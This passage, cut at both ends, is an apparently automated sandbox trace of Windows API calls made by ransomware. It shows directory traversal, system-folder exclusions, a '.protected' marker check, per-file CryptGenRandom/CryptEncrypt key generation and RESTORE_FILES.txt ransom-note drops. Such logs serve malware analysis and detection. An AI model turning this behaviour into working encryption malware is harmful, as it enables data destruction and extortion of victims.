NT\\MSFax\\VirtualInbox\\en-US\\.") returned 70 [0093.299] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0093.299] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0093.299] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0093.299] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0093.299] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0093.299] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0093.299] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0093.299] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\VirtualInbox\\en-US\\..") returned 71 [0093.299] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0093.299] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0093.299] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0093.299] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Windows") returned -1 [0093.299] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files") returned 1 [0093.299] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files (x86)") returned 1 [0093.299] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="$Recycle.bin") returned 1 [0093.299] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="System Volume Information") returned -1 [0093.299] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\VirtualInbox\\en-US\\RESTORE_FILES.txt") returned 86 [0093.299] StrStrIW (lpFirst="RESTORE_FILES.txt", lpSrch=".protected") returned 0x0 [0093.299] lstrcmpW (lpString1="RESTORE_FILES.txt", lpString2="RESTORE_FILES.txt") returned 0 [0093.299] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0093.299] lstrcmpiW (lpString1="WelcomeFax.tif", lpString2="Windows") returned -1 [0093.299] lstrcmpiW (lpString1="WelcomeFax.tif", lpString2="Program Files") returned 1 [0093.299] lstrcmpiW (lpString1="WelcomeFax.tif", lpString2="Program Files (x86)") returned 1 [0093.299] lstrcmpiW (lpString1="WelcomeFax.tif", lpString2="$Recycle.bin") returned 1 [0093.299] lstrcmpiW (lpString1="WelcomeFax.tif", lpString2="System Volume Information") returned 1 [0093.299] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\VirtualInbox\\en-US\\WelcomeFax.tif") returned 83 [0093.299] StrStrIW (lpFirst="WelcomeFax.tif", lpSrch=".protected") returned 0x0 [0093.299] lstrcmpW (lpString1="WelcomeFax.tif", lpString2="RESTORE_FILES.txt") returned 1 [0093.299] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0093.299] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0093.299] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\VirtualInbox\\en-US\\WelcomeFax.tif" (normalized: "c:\\users\\all users\\microsoft\\windows nt\\msfax\\virtualinbox\\en-us\\welcomefax.tif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.299] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 0 [0093.299] FindClose (in: hFindFile=0x47ba90 | out: hFindFile=0x47ba90) returned 1 [0093.299] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\VirtualInbox\\en-US\\RESTORE_FILES.txt") returned 86 [0093.299] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\VirtualInbox\\en-US\\RESTORE_FILES.txt" (normalized: "c:\\users\\all users\\microsoft\\windows nt\\msfax\\virtualinbox\\en-us\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.300] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.300] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Windows") returned -1 [0093.300] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files") returned 1 [0093.300] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files (x86)") returned 1 [0093.300] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="$Recycle.bin") returned 1 [0093.300] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="System Volume Information") returned -1 [0093.300] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\VirtualInbox\\RESTORE_FILES.txt") returned 80 [0093.300] StrStrIW (lpFirst="RESTORE_FILES.txt", lpSrch=".protected") returned 0x0 [0093.300] lstrcmpW (lpString1="RESTORE_FILES.txt", lpString2="RESTORE_FILES.txt") returned 0 [0093.300] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0 [0093.300] FindClose (in: hFindFile=0x47ba50 | out: hFindFile=0x47ba50) returned 1 [0093.300] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\VirtualInbox\\RESTORE_FILES.txt") returned 80 [0093.300] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\VirtualInbox\\RESTORE_FILES.txt" (normalized: "c:\\users\\all users\\microsoft\\windows nt\\msfax\\virtualinbox\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.300] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0 [0093.300] FindClose (in: hFindFile=0x47ba10 | out: hFindFile=0x47ba10) returned 1 [0093.301] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\RESTORE_FILES.txt") returned 67 [0093.301] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\RESTORE_FILES.txt" (normalized: "c:\\users\\all users\\microsoft\\windows nt\\msfax\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.301] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0093.301] lstrcmpiW (lpString1="MSScan", lpString2="Windows") returned -1 [0093.301] lstrcmpiW (lpString1="MSScan", lpString2="Program Files") returned -1 [0093.301] lstrcmpiW (lpString1="MSScan", lpString2="Program Files (x86)") returned -1 [0093.301] lstrcmpiW (lpString1="MSScan", lpString2="$Recycle.bin") returned 1 [0093.301] lstrcmpiW (lpString1="MSScan", lpString2="System Volume Information") returned -1 [0093.301] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSScan") returned 50 [0093.301] lstrcmpW (lpString1="MSScan", lpString2=".") returned 1 [0093.301] lstrcmpW (lpString1="MSScan", lpString2="..") returned 1 [0093.301] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSScan\\*") returned 52 [0093.301] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSScan\\*", lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0x47ba10 [0093.301] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0093.301] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0093.301] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0093.301] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0093.301] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0093.301] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSScan\\.") returned 52 [0093.301] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0093.301] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0093.302] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0093.302] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0093.302] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0093.302] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0093.302] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0093.302] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSScan\\..") returned 53 [0093.302] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0093.302] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0093.302] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0093.302] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Windows") returned -1 [0093.302] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files") returned 1 [0093.302] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files (x86)") returned 1 [0093.302] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="$Recycle.bin") returned 1 [0093.302] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="System Volume Information") returned -1 [0093.302] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSScan\\RESTORE_FILES.txt") returned 68 [0093.302] StrStrIW (lpFirst="RESTORE_FILES.txt", lpSrch=".protected") returned 0x0 [0093.302] lstrcmpW (lpString1="RESTORE_FILES.txt", lpString2="RESTORE_FILES.txt") returned 0 [0093.302] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0093.302] lstrcmpiW (lpString1="WelcomeScan.jpg", lpString2="Windows") returned -1 [0093.302] lstrcmpiW (lpString1="WelcomeScan.jpg", lpString2="Program Files") returned 1 [0093.302] lstrcmpiW (lpString1="WelcomeScan.jpg", lpString2="Program Files (x86)") returned 1 [0093.302] lstrcmpiW (lpString1="WelcomeScan.jpg", lpString2="$Recycle.bin") returned 1 [0093.302] lstrcmpiW (lpString1="WelcomeScan.jpg", lpString2="System Volume Information") returned 1 [0093.302] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSScan\\WelcomeScan.jpg") returned 66 [0093.302] StrStrIW (lpFirst="WelcomeScan.jpg", lpSrch=".protected") returned 0x0 [0093.302] lstrcmpW (lpString1="WelcomeScan.jpg", lpString2="RESTORE_FILES.txt") returned 1 [0093.302] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0093.302] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x30) returned 1 [0093.302] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSScan\\WelcomeScan.jpg" (normalized: "c:\\users\\all users\\microsoft\\windows nt\\msscan\\welcomescan.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.302] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0 [0093.302] FindClose (in: hFindFile=0x47ba10 | out: hFindFile=0x47ba10) returned 1 [0093.303] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSScan\\RESTORE_FILES.txt") returned 68 [0093.303] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSScan\\RESTORE_FILES.txt" (normalized: "c:\\users\\all users\\microsoft\\windows nt\\msscan\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.303] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0093.303] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Windows") returned -1 [0093.303] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files") returned 1 [0093.303] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files (x86)") returned 1 [0093.303] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="$Recycle.bin") returned 1 [0093.303] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="System Volume Information") returned -1 [0093.303] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\RESTORE_FILES.txt") returned 61 [0093.303] StrStrIW (lpFirst="RESTORE_FILES.txt", lpSrch=".protected") returned 0x0 [0093.303] lstrcmpW (lpString1="RESTORE_FILES.txt", lpString2="RESTORE_FILES.txt") returned 0 [0093.303] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0 [0093.303] FindClose (in: hFindFile=0x47b9d0 | out: hFindFile=0x47b9d0) returned 1 [0093.303] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\RESTORE_FILES.txt") returned 61 [0093.303] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\RESTORE_FILES.txt" (normalized: "c:\\users\\all users\\microsoft\\windows nt\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.304] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0093.304] lstrcmpiW (lpString1="WwanSvc", lpString2="Windows") returned 1 [0093.304] lstrcmpiW (lpString1="WwanSvc", lpString2="Program Files") returned 1 [0093.304] lstrcmpiW (lpString1="WwanSvc", lpString2="Program Files (x86)") returned 1 [0093.304] lstrcmpiW (lpString1="WwanSvc", lpString2="$Recycle.bin") returned 1 [0093.304] lstrcmpiW (lpString1="WwanSvc", lpString2="System Volume Information") returned 1 [0093.304] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\WwanSvc") returned 40 [0093.304] lstrcmpW (lpString1="WwanSvc", lpString2=".") returned 1 [0093.304] lstrcmpW (lpString1="WwanSvc", lpString2="..") returned 1 [0093.305] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\WwanSvc\\*") returned 42 [0093.305] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\WwanSvc\\*", lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0x47b9d0 [0093.305] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0093.305] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0093.305] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0093.305] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0093.305] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0093.305] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\WwanSvc\\.") returned 42 [0093.305] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0093.305] StrStrIW (lpFirst=".", lpSrch=".protected") returned 0x0 [0093.305] lstrcmpW (lpString1=".", lpString2="RESTORE_FILES.txt") returned -1 [0093.305] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0093.305] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x30) returned 1 [0093.305] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\WwanSvc\\." (normalized: "c:\\users\\all users\\microsoft\\wwansvc\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.305] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0093.305] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0093.305] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0093.305] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0093.305] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0093.305] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0093.305] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\WwanSvc\\..") returned 43 [0093.305] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0093.305] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0093.305] StrStrIW (lpFirst="..", lpSrch=".protected") returned 0x0 [0093.305] lstrcmpW (lpString1="..", lpString2="RESTORE_FILES.txt") returned -1 [0093.305] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0093.305] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x30) returned 1 [0093.305] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\WwanSvc\\.." (normalized: "c:\\users\\all users\\microsoft"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.306] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0093.306] lstrcmpiW (lpString1="Profiles", lpString2="Windows") returned -1 [0093.306] lstrcmpiW (lpString1="Profiles", lpString2="Program Files") returned -1 [0093.306] lstrcmpiW (lpString1="Profiles", lpString2="Program Files (x86)") returned -1 [0093.306] lstrcmpiW (lpString1="Profiles", lpString2="$Recycle.bin") returned 1 [0093.306] lstrcmpiW (lpString1="Profiles", lpString2="System Volume Information") returned -1 [0093.306] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\WwanSvc\\Profiles") returned 49 [0093.306] lstrcmpW (lpString1="Profiles", lpString2=".") returned 1 [0093.306] lstrcmpW (lpString1="Profiles", lpString2="..") returned 1 [0093.306] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\WwanSvc\\Profiles\\*") returned 51 [0093.306] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\WwanSvc\\Profiles\\*", lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0x47ba10 [0093.306] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0093.306] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0093.306] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0093.306] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0093.306] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0093.306] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\WwanSvc\\Profiles\\.") returned 51 [0093.306] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0093.307] StrStrIW (lpFirst=".", lpSrch=".protected") returned 0x0 [0093.307] lstrcmpW (lpString1=".", lpString2="RESTORE_FILES.txt") returned -1 [0093.307] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0093.307] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x30) returned 1 [0093.307] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\WwanSvc\\Profiles\\." (normalized: "c:\\users\\all users\\microsoft\\wwansvc\\profiles\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.307] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0093.307] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0093.307] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0093.307] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0093.307] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0093.307] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0093.307] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\WwanSvc\\Profiles\\..") returned 52 [0093.307] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0093.307] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0093.307] StrStrIW (lpFirst="..", lpSrch=".protected") returned 0x0 [0093.307] lstrcmpW (lpString1="..", lpString2="RESTORE_FILES.txt") returned -1 [0093.307] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0093.307] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x30) returned 1 [0093.307] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\WwanSvc\\Profiles\\.." (normalized: "c:\\users\\all users\\microsoft\\wwansvc"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.307] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0 [0093.307] FindClose (in: hFindFile=0x47ba10 | out: hFindFile=0x47ba10) returned 1 [0093.307] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\WwanSvc\\Profiles\\RESTORE_FILES.txt") returned 67 [0093.307] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\WwanSvc\\Profiles\\RESTORE_FILES.txt" (normalized: "c:\\users\\all users\\microsoft\\wwansvc\\profiles\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.307] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0093.308] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Windows") returned -1 [0093.308] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files") returned 1 [0093.308] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files (x86)") returned 1 [0093.308] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="$Recycle.bin") returned 1 [0093.308] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="System Volume Information") returned -1 [0093.308] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\WwanSvc\\RESTORE_FILES.txt") returned 58 [0093.308] StrStrIW (lpFirst="RESTORE_FILES.txt", lpSrch=".protected") returned 0x0 [0093.308] lstrcmpW (lpString1="RESTORE_FILES.txt", lpString2="RESTORE_FILES.txt") returned 0 [0093.308] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0 [0093.308] FindClose (in: hFindFile=0x47b9d0 | out: hFindFile=0x47b9d0) returned 1 [0093.308] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\WwanSvc\\RESTORE_FILES.txt") returned 58 [0093.308] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\WwanSvc\\RESTORE_FILES.txt" (normalized: "c:\\users\\all users\\microsoft\\wwansvc\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.309] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0 [0093.309] FindClose (in: hFindFile=0x47b990 | out: hFindFile=0x47b990) returned 1 [0093.309] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\RESTORE_FILES.txt") returned 50 [0093.309] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\RESTORE_FILES.txt" (normalized: "c:\\users\\all users\\microsoft\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.309] FindNextFileW (in: hFindFile=0x47b950, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0093.309] lstrcmpiW (lpString1="Microsoft Help", lpString2="Windows") returned -1 [0093.309] lstrcmpiW (lpString1="Microsoft Help", lpString2="Program Files") returned -1 [0093.309] lstrcmpiW (lpString1="Microsoft Help", 